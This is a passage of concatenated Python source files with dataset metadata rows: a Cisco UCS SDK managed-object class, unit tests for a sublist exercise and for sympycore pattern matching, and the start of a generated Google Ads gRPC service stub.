RMT_ERR_CODE_ERR_IBMC_FRU_RETRIEVAL_ERROR = "ERR-IBMC-fru-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_INVALID_END_POINT_CONFIG = "ERR-IBMC-invalid-end-point-config"
RMT_ERR_CODE_ERR_IBMC_RESULTS_NOT_READY = "ERR-IBMC-results-not-ready"
RMT_ERR_CODE_ERR_MAX_SUBSCRIPTIONS_ALLOWED_ERROR = "ERR-MAX-subscriptions-allowed-error"
RMT_ERR_CODE_ERR_MO_CONFIG_CHILD_OBJECT_CANT_BE_CONFIGURED = "ERR-MO-CONFIG-child-object-cant-be-configured"
RMT_ERR_CODE_ERR_MO_META_NO_SUCH_OBJECT_CLASS = "ERR-MO-META-no-such-object-class"
RMT_ERR_CODE_ERR_MO_PROPERTY_NO_SUCH_PROPERTY = "ERR-MO-PROPERTY-no-such-property"
RMT_ERR_CODE_ERR_MO_PROPERTY_VALUE_OUT_OF_RANGE = "ERR-MO-PROPERTY-value-out-of-range"
RMT_ERR_CODE_ERR_MO_ACCESS_DENIED = "ERR-MO-access-denied"
RMT_ERR_CODE_ERR_MO_DELETION_RULE_VIOLATION = "ERR-MO-deletion-rule-violation"
RMT_ERR_CODE_ERR_MO_DUPLICATE_OBJECT = "ERR-MO-duplicate-object"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CONTAINMENT = "ERR-MO-illegal-containment"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CREATION = "ERR-MO-illegal-creation"
RMT_ERR_CODE_ERR_MO_ILLEGAL_ITERATOR_STATE = "ERR-MO-illegal-iterator-state"
RMT_ERR_CODE_ERR_MO_ILLEGAL_OBJECT_LIFECYCLE_TRANSITION = "ERR-MO-illegal-object-lifecycle-transition"
RMT_ERR_CODE_ERR_MO_NAMING_RULE_VIOLATION = "ERR-MO-naming-rule-violation"
RMT_ERR_CODE_ERR_MO_OBJECT_NOT_FOUND = "ERR-MO-object-not-found"
RMT_ERR_CODE_ERR_MO_RESOURCE_ALLOCATION = "ERR-MO-resource-allocation"
RMT_ERR_CODE_ERR_NTP_DELETE_ERROR = "ERR-NTP-delete-error"
RMT_ERR_CODE_ERR_NTP_GET_ERROR = "ERR-NTP-get-error"
RMT_ERR_CODE_ERR_NTP_SET_ERROR = "ERR-NTP-set-error"
RMT_ERR_CODE_ERR_POWER_CAP_UNSUPPORTED = "ERR-POWER-CAP-UNSUPPORTED"
RMT_ERR_CODE_ERR_POWER_PROFILE_IN_PROGRESS = "ERR-POWER-PROFILE-IN-PROGRESS"
RMT_ERR_CODE_ERR_SERVER_MIS_CONNECT = "ERR-SERVER-mis-connect"
RMT_ERR_CODE_ERR_SWITCH_INVALID_IF_CONFIG = "ERR-SWITCH-invalid-if-config"
RMT_ERR_CODE_ERR_TOKEN_REQUEST_DENIED = "ERR-TOKEN-request-denied"
RMT_ERR_CODE_ERR_UNABLE_TO_FETCH_BIOS_SETTINGS = "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS"
RMT_ERR_CODE_ERR_UPDATE_FAILED = "ERR-UPDATE-failed"
RMT_ERR_CODE_ERR_UPDATE_IN_PROGRESS = "ERR-UPDATE-in-progress"
RMT_ERR_CODE_ERR_UPDATE_RETRY = "ERR-UPDATE-retry"
RMT_ERR_CODE_ERR_AAA_CONFIG_MODIFY_ERROR = "ERR-aaa-config-modify-error"
RMT_ERR_CODE_ERR_ACCT_REALM_SET_ERROR = "ERR-acct-realm-set-error"
RMT_ERR_CODE_ERR_ADMIN_PASSWD_SET = "ERR-admin-passwd-set"
RMT_ERR_CODE_ERR_AUTH_ISSUE = "ERR-auth-issue"
RMT_ERR_CODE_ERR_AUTH_REALM_GET_ERROR = "ERR-auth-realm-get-error"
RMT_ERR_CODE_ERR_AUTH_REALM_SET_ERROR = "ERR-auth-realm-set-error"
RMT_ERR_CODE_ERR_AUTHENTICATION = "ERR-authentication"
RMT_ERR_CODE_ERR_AUTHORIZATION_REQUIRED = "ERR-authorization-required"
RMT_ERR_CODE_ERR_CLI_SESSION_LIMIT_REACHED = "ERR-cli-session-limit-reached"
RMT_ERR_CODE_ERR_CREATE_KEYRING = "ERR-create-keyring"
RMT_ERR_CODE_ERR_CREATE_LOCALE = "ERR-create-locale"
RMT_ERR_CODE_ERR_CREATE_ROLE = "ERR-create-role"
RMT_ERR_CODE_ERR_CREATE_TP = "ERR-create-tp"
RMT_ERR_CODE_ERR_CREATE_USER = "ERR-create-user"
RMT_ERR_CODE_ERR_DELETE_LOCALE = "ERR-delete-locale"
RMT_ERR_CODE_ERR_DELETE_ROLE = "ERR-delete-role"
RMT_ERR_CODE_ERR_DELETE_SESSION = "ERR-delete-session"
RMT_ERR_CODE_ERR_DELETE_USER = "ERR-delete-user"
RMT_ERR_CODE_ERR_DOWNGRADE_FAIL = "ERR-downgrade-fail"
RMT_ERR_CODE_ERR_EFI_DIAGNOSTICS_IN_PROGRESS = "ERR-efi-Diagnostics--in-progress"
RMT_ERR_CODE_ERR_ENABLE_MGMT_CONN = "ERR-enable-mgmt-conn"
RMT_ERR_CODE_ERR_EP_SET_ERROR = "ERR-ep-set-error"
RMT_ERR_CODE_ERR_GET_MAX_HTTP_USER_SESSIONS = "ERR-get-max-http-user-sessions"
RMT_ERR_CODE_ERR_HTTP_INITIALIZING = "ERR-http-initializing"
RMT_ERR_CODE_ERR_INSUFFICIENTLY_EQUIPPED = "ERR-insufficiently-equipped"
RMT_ERR_CODE_ERR_INTERNAL_ERROR = "ERR-internal-error"
RMT_ERR_CODE_ERR_LDAP_DELETE_ERROR = "ERR-ldap-delete-error"
RMT_ERR_CODE_ERR_LDAP_GET_ERROR = "ERR-ldap-get-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_MODIFY_ERROR = "ERR-ldap-group-modify-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_SET_ERROR = "ERR-ldap-group-set-error"
RMT_ERR_CODE_ERR_LDAP_SET_ERROR = "ERR-ldap-set-error"
RMT_ERR_CODE_ERR_LOCALE_SET_ERROR = "ERR-locale-set-error"
RMT_ERR_CODE_ERR_MAX_USERID_SESSIONS_REACHED = "ERR-max-userid-sessions-reached"
RMT_ERR_CODE_ERR_MISSING_METHOD = "ERR-missing-method"
RMT_ERR_CODE_ERR_MODIFY_LOCALE = "ERR-modify-locale"
RMT_ERR_CODE_ERR_MODIFY_ROLE = "ERR-modify-role"
RMT_ERR_CODE_ERR_MODIFY_USER = "ERR-modify-user"
RMT_ERR_CODE_ERR_MODIFY_USER_LOCALE = "ERR-modify-user-locale"
RMT_ERR_CODE_ERR_MODIFY_USER_ROLE = "ERR-modify-user-role"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_MODIFY_ERROR = "ERR-provider-group-modify-error"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_SET_ERROR = "ERR-provider-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_GET_ERROR = "ERR-radius-get-error"
RMT_ERR_CODE_ERR_RADIUS_GLOBAL_SET_ERROR = "ERR-radius-global-set-error"
RMT_ERR_CODE_ERR_RADIUS_GROUP_SET_ERROR = "ERR-radius-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_SET_ERROR = "ERR-radius-set-error"
RMT_ERR_CODE_ERR_REQUEST_TIMEOUT = "ERR-request-timeout"
RMT_ERR_CODE_ERR_RESET_ADAPTER = "ERR-reset-adapter"
RMT_ERR_CODE_ERR_ROLE_SET_ERROR = "ERR-role-set-error"
RMT_ERR_CODE_ERR_SECONDARY_NODE = "ERR-secondary-node"
RMT_ERR_CODE_ERR_SERVICE_NOT_READY = "ERR-service-not-ready"
RMT_ERR_CODE_ERR_SESSION_CACHE_FULL = "ERR-session-cache-full"
RMT_ERR_CODE_ERR_SESSION_NOT_FOUND = "ERR-session-not-found"
RMT_ERR_CODE_ERR_SET_KEY_CERT = "ERR-set-key-cert"
RMT_ERR_CODE_ERR_SET_LOGIN_PROFILE = "ERR-set-login-profile"
RMT_ERR_CODE_ERR_SET_MIN_PASSPHRASE_LENGTH = "ERR-set-min-passphrase-length"
RMT_ERR_CODE_ERR_SET_NETWORK = "ERR-set-network"
RMT_ERR_CODE_ERR_SET_PASSWORD_STRENGTH_CHECK = "ERR-set-password-strength-check"
RMT_ERR_CODE_ERR_SET_PORT_CHANNEL = "ERR-set-port-channel"
RMT_ERR_CODE_ERR_STORE_PRE_LOGIN_BANNER_MSG = "ERR-store-pre-login-banner-msg"
RMT_ERR_CODE_ERR_TACACS_ENABLE_ERROR = "ERR-tacacs-enable-error"
RMT_ERR_CODE_ERR_TACACS_GLOBAL_SET_ERROR = "ERR-tacacs-global-set-error"
RMT_ERR_CODE_ERR_TACACS_GROUP_SET_ERROR = "ERR-tacacs-group-set-error"
RMT_ERR_CODE_ERR_TACACS_PLUS_GET_ERROR = "ERR-tacacs-plus-get-error"
RMT_ERR_CODE_ERR_TACACS_SET_ERROR = "ERR-tacacs-set-error"
RMT_ERR_CODE_ERR_TEST_ERROR_1 = "ERR-test-error-1"
RMT_ERR_CODE_ERR_TEST_ERROR_2 = "ERR-test-error-2"
RMT_ERR_CODE_ERR_TIMEZONE_SET_ERROR = "ERR-timezone-set-error"
RMT_ERR_CODE_ERR_USER_ACCOUNT_EXPIRED = "ERR-user-account-expired"
RMT_ERR_CODE_ERR_USER_PASSWD_EXPIRED = "ERR-user-passwd-expired"
RMT_ERR_CODE_ERR_USER_SET_ERROR = "ERR-user-set-error"
RMT_ERR_CODE_ERR_XML_PARSE_ERROR = "ERR-xml-parse-error"
RMT_ERR_CODE_NONE = "none"
class IdentMetaSystemFsm(ManagedObject):
"""This is IdentMetaSystemFsm class."""
consts = IdentMetaSystemFsmConsts()
naming_props = set([])
mo_meta = MoMeta("IdentMetaSystemFsm", "identMetaSystemFsm", "fsm", VersionMeta.Version211a, "OutputOnly", 0xf, [], [""], ['identMetaSystem'], ['identMetaSystemFsmStage'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"completion_time": MoPropertyMeta("completion_time", "completionTime", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [""], []),
"current_fsm": MoPropertyMeta("current_fsm", "currentFsm", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["nop", "sync", "ucscUnivSync"], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"fsm_status": MoPropertyMeta("fsm_status", "fsmStatus", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, None, ["fail", "inProgress", "nop", "pending", "skip", "success", "throttled"], []),
"instance_id": MoPropertyMeta("instance_id", "instanceId", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "byte", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], ["0-100"]),
"rmt_err_code": MoPropertyMeta("rmt_err_code", "rmtErrCode", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["ERR-2fa-auth-retry", "ERR-ACTIVATE-failed", "ERR-ACTIVATE-in-progress", "ERR-ACTIVATE-retry", "ERR-BIOS-TOKENS-OLD-BIOS", "ERR-BIOS-TOKENS-OLD-CIMC", "ERR-BIOS-network-boot-order-not-found", "ERR-BOARDCTRLUPDATE-ignore", "ERR-DIAG-cancelled", "ERR-DIAG-fsm-restarted", "ERR-DIAG-test-failed", "ERR-DNLD-authentication-failure", "ERR-DNLD-hostkey-mismatch", "ERR-DNLD-invalid-image", "ERR-DNLD-no-file", "ERR-DNLD-no-space", "ERR-DNLD-usb-unmounted", "ERR-DNS-delete-error", "ERR-DNS-get-error", "ERR-DNS-set-error", "ERR-Diagnostics-in-progress", "ERR-Diagnostics-memtest-in-progress", "ERR-Diagnostics-network-in-progress", "ERR-FILTER-illegal-format", "ERR-FSM-no-such-state", "ERR-HOST-fru-identity-mismatch", "ERR-HTTP-set-error", "ERR-HTTPS-set-error", "ERR-IBMC-analyze-results", "ERR-IBMC-connect-error", "ERR-IBMC-connector-info-retrieval-error", "ERR-IBMC-fru-retrieval-error", "ERR-IBMC-invalid-end-point-config", "ERR-IBMC-results-not-ready", "ERR-MAX-subscriptions-allowed-error", "ERR-MO-CONFIG-child-object-cant-be-configured", "ERR-MO-META-no-such-object-class", "ERR-MO-PROPERTY-no-such-property", "ERR-MO-PROPERTY-value-out-of-range", "ERR-MO-access-denied", "ERR-MO-deletion-rule-violation", "ERR-MO-duplicate-object", "ERR-MO-illegal-containment", "ERR-MO-illegal-creation", "ERR-MO-illegal-iterator-state", "ERR-MO-illegal-object-lifecycle-transition", "ERR-MO-naming-rule-violation", "ERR-MO-object-not-found", "ERR-MO-resource-allocation", "ERR-NTP-delete-error", "ERR-NTP-get-error", "ERR-NTP-set-error", "ERR-POWER-CAP-UNSUPPORTED", "ERR-POWER-PROFILE-IN-PROGRESS", "ERR-SERVER-mis-connect", "ERR-SWITCH-invalid-if-config", "ERR-TOKEN-request-denied", "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS", "ERR-UPDATE-failed", "ERR-UPDATE-in-progress", "ERR-UPDATE-retry", "ERR-aaa-config-modify-error", "ERR-acct-realm-set-error", "ERR-admin-passwd-set", "ERR-auth-issue", "ERR-auth-realm-get-error", "ERR-auth-realm-set-error", "ERR-authentication", "ERR-authorization-required", "ERR-cli-session-limit-reached", "ERR-create-keyring", "ERR-create-locale", "ERR-create-role", "ERR-create-tp", "ERR-create-user", "ERR-delete-locale", "ERR-delete-role", "ERR-delete-session", "ERR-delete-user", "ERR-downgrade-fail", "ERR-efi-Diagnostics--in-progress", "ERR-enable-mgmt-conn", "ERR-ep-set-error", "ERR-get-max-http-user-sessions", "ERR-http-initializing", "ERR-insufficiently-equipped", "ERR-internal-error", "ERR-ldap-delete-error", "ERR-ldap-get-error", "ERR-ldap-group-modify-error", "ERR-ldap-group-set-error", "ERR-ldap-set-error", "ERR-locale-set-error", "ERR-max-userid-sessions-reached", "ERR-missing-method", "ERR-modify-locale", "ERR-modify-role", "ERR-modify-user", "ERR-modify-user-locale", "ERR-modify-user-role", "ERR-provider-group-modify-error", "ERR-provider-group-set-error", "ERR-radius-get-error", "ERR-radius-global-set-error", "ERR-radius-group-set-error", "ERR-radius-set-error", "ERR-request-timeout", "ERR-reset-adapter", "ERR-role-set-error", "ERR-secondary-node", "ERR-service-not-ready", "ERR-session-cache-full", "ERR-session-not-found", "ERR-set-key-cert", "ERR-set-login-profile", "ERR-set-min-passphrase-length", "ERR-set-network", "ERR-set-password-strength-check", "ERR-set-port-channel", "ERR-store-pre-login-banner-msg", "ERR-tacacs-enable-error", "ERR-tacacs-global-set-error", "ERR-tacacs-group-set-error", "ERR-tacacs-plus-get-error", "ERR-tacacs-set-error", 
"ERR-test-error-1", "ERR-test-error-2", "ERR-timezone-set-error", "ERR-user-account-expired", "ERR-user-passwd-expired", "ERR-user-set-error", "ERR-xml-parse-error", "none"], ["0-4294967295"]),
"rmt_err_descr": MoPropertyMeta("rmt_err_descr", "rmtErrDescr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rmt_rslt": MoPropertyMeta("rmt_rslt", "rmtRslt", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout),){0,32}(defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout){0,1}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"completionTime": "completion_time",
"currentFsm": "current_fsm",
"descr": "descr",
"dn": "dn",
"fsmStatus": "fsm_status",
"instanceId": "instance_id",
"progress": "progress",
"rmtErrCode": "rmt_err_code",
"rmtErrDescr": "rmt_err_descr",
"rmtRslt": "rmt_rslt",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.completion_time = None
self.current_fsm = None
self.descr = None
self.fsm_status = None
self.instance_id = None
self.progress = None
self.rmt_err_code = None
self.rmt_err_descr = None
self.rmt_rslt = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "IdentMetaSystemFsm", parent_mo_or_dn, **kwargs)
| 87.699531 | 3,753 | 0.756959 | ["Apache-2.0"] | CiscoUcs/ucsmsdk | ucsmsdk/mometa/ident/IdentMetaSystemFsm.py | 18,680 | Python |
import unittest
from sublist import check_lists, SUBLIST, SUPERLIST, EQUAL, UNEQUAL
class SublistTest(unittest.TestCase):
def test_unique_return_vals(self):
self.assertEqual(4, len(set([SUBLIST, SUPERLIST, EQUAL, UNEQUAL])))
def test_empty_lists(self):
self.assertEqual(EQUAL, check_lists([], []))
def test_empty_list_within(self):
self.assertEqual(SUBLIST, check_lists([], [1, 2, 3]))
def test_within_empty_list(self):
self.assertEqual(SUPERLIST, check_lists([1], []))
def test_equal_lists(self):
l1 = [0, 1, 2]
l2 = [0, 1, 2]
self.assertEqual(EQUAL, check_lists(l1, l2))
def test_different_lists(self):
l1 = list(range(1000000))
l2 = list(range(1, 1000001))
self.assertEqual(UNEQUAL, check_lists(l1, l2))
def test_false_start(self):
l1 = [1, 2, 5]
l2 = [0, 1, 2, 3, 1, 2, 5, 6]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_consecutive(self):
l1 = [1, 1, 2]
l2 = [0, 1, 1, 1, 2, 1, 2]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_sublist_at_start(self):
l1 = [0, 1, 2]
l2 = [0, 1, 2, 3, 4, 5]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_sublist_in_middle(self):
l1 = [2, 3, 4]
l2 = [0, 1, 2, 3, 4, 5]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_sublist_at_end(self):
l1 = [3, 4, 5]
l2 = [0, 1, 2, 3, 4, 5]
self.assertEqual(SUBLIST, check_lists(l1, l2))
def test_at_start_of_superlist(self):
l1 = [0, 1, 2, 3, 4, 5]
l2 = [0, 1, 2]
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_in_middle_of_superlist(self):
l1 = [0, 1, 2, 3, 4, 5]
l2 = [2, 3]
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_at_end_of_superlist(self):
l1 = [0, 1, 2, 3, 4, 5]
l2 = [3, 4, 5]
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_large_lists(self):
l1 = list(range(1000)) * 1000 + list(range(1000, 1100))
l2 = list(range(900, 1050))
self.assertEqual(SUPERLIST, check_lists(l1, l2))
def test_spread_sublist(self):
multiples_of_3 = list(range(3, 200, 3))
multiples_of_15 = list(range(15, 200, 15))
self.assertEqual(UNEQUAL,
check_lists(multiples_of_15, multiples_of_3))
def test_avoid_sets(self):
self.assertEqual(UNEQUAL, check_lists([1, 3], [1, 2, 3]))
self.assertEqual(UNEQUAL, check_lists([1, 2, 3], [1, 3]))
self.assertEqual(UNEQUAL, check_lists([1, 2, 3], [3, 2, 1]))
if __name__ == '__main__':
unittest.main()
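
# --- Illustrative sketch (not part of the exercise tests above) ---
# A minimal reference implementation of the interface these tests assume,
# included only to clarify the behaviour expected of check_lists(); the real
# `sublist` solution module may differ. Names carry a _sketch suffix so they
# do not shadow the module imported at the top of this file.
def _contains_run(big, small):
    """True when `small` occurs as a contiguous run inside `big`."""
    if not small:
        return True
    return any(big[i] == small[0] and big[i:i + len(small)] == small
               for i in range(len(big) - len(small) + 1))

def check_lists_sketch(l1, l2):
    if l1 == l2:
        return EQUAL
    if _contains_run(l2, l1):
        return SUBLIST
    if _contains_run(l1, l2):
        return SUPERLIST
    return UNEQUAL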
| 31.022727 | 75 | 0.586081 | ["MIT"] | KT12/Exercism | python/sublist/sublist_test.py | 2,730 | Python |
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
#assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}
#assert p.matches(Number(4),*wargs)=={w:2}
#assert p.matches(Number(16),*wargs)=={w:4}
#assert p.matches(Number(9),*wargs)=={w:3}
#assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
#assert p.matches(s**4,*wargs)=={w:s**2}
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
#assert p.matches(s**2*4,*wargs)=={w:2*s}
#assert p.matches(s**2*t**2,*wargs)=={w:s*t}
#assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}
#assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}
#assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}
assert p.matches(s**2*t**3,*wargs)==None
#assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2}
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| 29.427778 | 103 | 0.537474 | ["Apache-2.0"] | 1zinnur9/pymaclab | sympycore/basealgebra/tests/test_matches.py | 5,297 | Python |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v2.proto.resources import feed_item_target_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2
from google.ads.google_ads.v2.proto.services import feed_item_target_service_pb2 as google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2
class FeedItemTargetServiceStub(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetFeedItemTarget = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/GetFeedItemTarget',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.FromString,
)
self.MutateFeedItemTargets = channel.unary_unary(
'/google.ads.googleads.v2.services.FeedItemTargetService/MutateFeedItemTargets',
request_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.FromString,
)
class FeedItemTargetServiceServicer(object):
"""Proto file describing the FeedItemTarget service.
Service to manage feed item targets.
"""
def GetFeedItemTarget(self, request, context):
"""Returns the requested feed item targets in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateFeedItemTargets(self, request, context):
"""Creates or removes feed item targets. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FeedItemTargetServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetFeedItemTarget': grpc.unary_unary_rpc_method_handler(
servicer.GetFeedItemTarget,
